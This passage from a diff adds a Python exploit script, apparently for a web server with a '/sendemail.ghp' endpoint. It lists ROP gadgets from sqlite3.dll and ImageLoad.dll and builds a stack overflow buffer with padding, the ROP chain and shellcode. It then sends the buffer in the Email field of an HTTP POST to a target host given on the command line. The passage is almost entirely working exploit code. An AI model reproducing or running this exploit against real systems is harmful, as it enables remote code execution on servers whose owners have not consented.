+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
+		0x1001bd98,  # POP ECX # RETN [ImageLoad.dll]
+		0x1004de84,  # &Writable location [ImageLoad.dll]
+		0x61c373a4,  # POP EDI # RETN [sqlite3.dll]
+		0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
+		0x10015442,  # POP EAX # RETN [ImageLoad.dll]
+		0x90909090,  # nop
+		0x100240c2,  # PUSHAD # RETN [ImageLoad.dll]
+    ]
+    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+	
+rop_chain = create_rop_chain()
+
+buf = "A"*2278 + rop_chain + shellcode + "B"*(1794-len(shellcode)-len(rop_chain)) + ret
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((sys.argv[1], 80))
+s.send("POST /sendemail.ghp HTTP/1.1\r\n\r\nEmail=" + buf + "&getPassword=Get+Password")
+
+s.close()